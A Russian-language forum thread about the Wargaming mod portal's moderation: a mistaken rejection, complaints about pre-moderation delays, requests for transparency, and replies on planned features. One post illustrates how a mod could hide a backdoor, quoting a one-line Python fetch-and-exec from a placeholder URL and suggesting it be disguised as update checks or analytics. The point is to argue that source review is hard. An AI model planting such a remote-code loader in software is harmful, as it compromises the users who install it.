Jump to content
Korean Random
ribbed

Портал модов от WG

Recommended Posts

Привет. 

 

Насчёт этого случая: произошла ошибка при модерации. Да, после удаления скриншота ваш мод снова поступил в очередь и после проверки должен был быть опубликован, но ошибочно был выбран не тот пункт в меню администратора. Это произошло случайно, ошибка исправлена. Извиняюсь за это неудобство. 

Да, насчёт пустого комментария: он был удалён, так как автор убрал нарушающий скриншот и необходимость в каком-то комментарии со стороны модератора отпала. Если бы статус был "Опубликовано" - этого пустого поля автор не увидел бы. Но так как статус ошибочно был выставлен "Отклонено", а при таком статусе комментарий обязателен, то вылезло пустое поле. 

  • Upvote 2

Share this post


Link to post

Short link
Share on other sites
1 час назад, Finister сказал:

Но так как статус ошибочно был выставлен "Отклонено", а при таком статусе комментарий обязателен, то вылезло пустое поле.

Т.е. для системы "пустое обязательное поле" это нормально. :facepalmic:

Ну и было-бы правильно чтобы в случае если мод отклонен, указывалось каким именно модератором.

  • Upvote 1

Share this post


Link to post

Short link
Share on other sites
2 hours ago, Finister said:

Насчёт этого случая: произошла ошибка при модерации.

Вопрос даже не в том, кто виноват, а в том, что система работает, мягко говоря, на троечку, если не на неуд. На исправление такой банальной ошибки ушло несколько дней, причем автор мода никак не может повлиять на скорость решения проблемы. Автор модификации все сделал ровно, а народ все равно сидит и ждет - вот суть всего происходящего. И это ни разу не нормально.

Ладно бы еще у вас там обновления клиента выходили раз в полгода, тогда пару дней погоды не делали бы, но если учитывать, с какой частотой сейчас приходится адаптировать моды, и как за последнее время у вас выкатывают обновления (недавняя история с микропатчем хэллоуина, который ну ни разу не микро), несложно догадаться, что пятая точка и так у многих уже весьма неслабо подгорает, причем по КД, так тут еще и обновления для модов задерживаются на модерации. Может быть с вашей стороны такой расклад событий вам кажется вполне нормальным, но со стороны мододелов и пользователей это выглядит как полный беспросветный, который подкрался незаметно, гордо задрав хвост.

Вывод уже давно озвучивали, и не один раз - нужно убирать премодерацию совсем, или ограничивать ее действие только на первичную публикацию мода.

Edited by GPCracker
  • Upvote 1

Share this post


Link to post

Short link
Share on other sites
1 час назад, ShuraBB сказал:

Ну и было-бы правильно чтобы в случае если мод отклонен, указывалось каким именно модератором.

 

Поддержу, стоит поработать над прозрачностью. Чтоб было понятно, что именно и когда произошло и кто за это в ответе. Совершил N-модератор X-действие с Y-данными, предоставленными Z-пользователем, должна появится отметка об этом, уведомляющая Z-пользователя об X-действии N-модератора над Y-данными.

  • Upvote 2

Share this post


Link to post

Short link
Share on other sites
19 minutes ago, Pavel3333 said:

в спешке заархивировал папки с модом, содержащиеся в mods, а саму папку mods не заархивировал.

Ну не знаю, как ты там архивируешь, а у меня давно уже эти задачи выполняет скрипт сборки. Так что с подобными ситуациями я уже больше года не сталкивался. Конечно, бывает я что-то тоже забываю где-то в конфиге сборки прописать, но в таком случае я на эту проблему сразу же сам и наткнусь, когда буду тестировать мод перед публикацией, если не раньше, ибо с переходом на пакеты вне пакетов только конфиги лежат, а на добавление/переименование/удаление файла в проекте есть список, что требуется прописать и где. Такой же список действий имеется и для релиза, что и где нужно сделать, что проверить, и в каком порядке.

Да и такие траблы с забытыми файлами все равно очень быстро находятся и репортятся пользователями, если среди пользователей твоего мода есть хоть немного адекватов.

5 minutes ago, StranikS_Scan said:

уведомляющая Z-пользователя об X-действии N-модератора над Y-данными

Я бы сказал, не только Z-пользователя, а вообще хранилась в публично доступном логе действий над "публикацией". Тогда модераторы будут семь раз думать над обоснованностью своих действий, перед тем, как что-то делать, а не просто делать в известном стиле.

 

 

Edited by GPCracker

Share this post


Link to post

Short link
Share on other sites
17 минут назад, Pavel3333 сказал:

У автора тоже могут быть косяки,

Могут и бывают. Вот только если нет явных косяков, модеры почти 100% под опубликуют (проходили такое), потом юзеры находят косяк, ты правишь и закидываешь его заново.

Так вот пока они будут модерить твою первую версию ты уже давно получишь кучу стонов на форуме, успеешь все исправить и отправить новую версию. Ну и нафига нужна такая карусель?

 

21 минуту назад, Pavel3333 сказал:

скрытый запрещенный функционал мода обнаружат совсем не сразу

Это ты очень оптимистично написал :-) Даже с исходником это "не сразу" будет весьма не быстрым.

Share this post


Link to post

Short link
Share on other sites
12 minutes ago, ShuraBB said:

Даже с исходником это "не сразу" будет весьма не быстрым.

Особенно если исходник сам по себе (без балласта) будет на 1000 или более строк кода, найти там что-то, не зная при этом, где нужно искать, будет попросту нереальным. Тем более что любой грамотный человек, которому потребуется туда что-то внедрить, будет не сам код туда добавлять, а просто сделает эксплоит на пару неприметных строчек кода в стиле try: exec urllib.open('<the-url>').read() except StandardError: pass, через который потом будет грузиться что нужно и откуда нужно. И оформит это дело под проверку обновлений для мода, динамическую подгрузку ресурсов, или под какую-нибудь банальную гугл-аналитику, раскидав код эксплоита по всему модулю, что без серьезного синтаксического анализа кода найти эксплоит будет крайне проблематично. Не говоря уже о том, что для эксплоита даже в интернет лазить из мода необязательно, можно с диска файлы подгружать.

Edited by GPCracker

Share this post


Link to post

Short link
Share on other sites
47 минут назад, ShuraBB сказал:

Это ты очень оптимистично написал :-) Даже с исходником это "не сразу" будет весьма не быстрым.

 

Отсюда весьма простой вывод - либо желающих модописать надо (т.е. будут) пропускать через жернова NDA и остатку на выходе давать право публиковаться без модерации, либо создать шаблон мода с крайне жесткими требованиями к исходному коду (оформление кода только по шаблону, запрет exec, запрет обфускации питон-кода и любого вида шифрования в питон-коде и всякое другое) и отклонять публикации массового и скопом при малейшем не соблюдении.

  • Upvote 2
  • Downvote 2

Share this post


Link to post

Short link
Share on other sites
31 minutes ago, StranikS_Scan said:

Отсюда весьма простой вывод

И следом все те, кому сие принципиально не вперлось, т.е. 99,9% адекватных мододелов, производящих реально годный контент, зашлют это дело настолько далеко, насколько это возможно, а толпы пользователей будут штурмовать официальный форум в надежде вернуть моды обратно. А поскольку картошка либо не идиоты, и не будут делать то, что придется откатывать, либо они будут как обычно упрямо бодать стену, просто продавливая апдейт и пытаясь зачистить недовольных, и тем самым просто окончательно сделают World of Tanks игрой исключительно для малолетних *****, поскольку почти все адекватные игроки без нормальных модов и с таким отношением администрации просто забьют на эту горку шлака в стиле игры (т.к. без модов игра для большинства хороших и вообще адекватных игроков станет реальным шлаком).

Edited by GPCracker

Share this post


Link to post

Short link
Share on other sites
30 minutes ago, Pavel3333 said:

папку конфига мода тоже скрипт архивирует?

Там идет сначала упаковка в пакеты без сжатия, а потом уже упаковка пакетов и конфигов в общий архив со сжатием для публикации.

Вообще скрипт не только упаковывает, он еще и собирает все, питон, флеш, локализацию, атласы, просто файлы... в общем, все, что есть в моих модификациях.

Если интересно - просто загляни ко мне в репозиторий :-)

  • Upvote 1

Share this post


Link to post

Short link
Share on other sites
20 hours ago, Pavel3333 said:

@ribbed, привет!

а что там про ноябрьские нововведения на портале модов? ноябрь уже прошел.

Еще допиливаем и стабилизируем, выйдет ориентировочно в середине декабря.

 

В бэклоге еще есть ряд фичей, которые мы будем закладывать на будущие версии, я попрошу вас помочь их приоритизировать, как закончим с текущей. Чтобы то, что вам нужней, на проде раньше оказалось.

 

И да, про баги и предложения по улучшению продолжайте писать в этой теме, пожалуйста. Я это все читаю и учитываю при планировании версий.

  • Upvote 3

Share this post


Link to post

Short link
Share on other sites
30 minutes ago, Pavel3333 said:
  1. либо скачивание мода не напрямую с wgmods, а с сайта (пример), с модерацией или без - дело ваше.

Очень вряд ли. Если я правильно понял, ты предлагаешь предусмотреть возможность скачивания с предоставленного мододелом зеркала. Мы на такое пойти не можем, так как, очевидно, зеркало вне нашего контроля находится.

Однако, никто не запрещает указать в описании мода и свой сайт, и тему на форуме.

 

34 minutes ago, Pavel3333 said:

либо добавить галочку в настройке мода, типа "мод обновляется сам, не скрывать его после патча на главной странице"

Это фичу уже просили, пока точно делать не будем, так как недобросовестные мододелы будут включать эту галку для всех своих модов по умолчанию, и отследить, кто добросовестный, а кто - нет, довольно проблематично.

Я полностью понимаю и разделяю фрустрацию по поводу премодерации каждого апдейта, и это в будущем будет основным вектором улучшения портала. В декабрьском апдейте мы очень сильно переработаем панель модераторов, чтобы они могли работать гораздо быстрей и эффективней - однако, обязательная премодерация останется на месте. А уже через версию у меня есть мысли добавить какое-то подобие "кармы" модов. Если ряд апдейтов прошел без нареканий и нет репортов юзеров о проблемах - мод получает статус "доверенный" и пропускает обязательную премодерацию апдейтов в будущем, пока не будет отрицательных репортов от игроков.

Пока это на уровне идеи и я ничего не обещаю, но, думаю, в этом направлении имеет смысл работать.

 

42 minutes ago, Pavel3333 said:

остается актуальным уведомление типа "на ваш комментарий ответил автор мода"

Будет в декабрьском апдейте.

  • Upvote 2

Share this post


Link to post

Short link
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...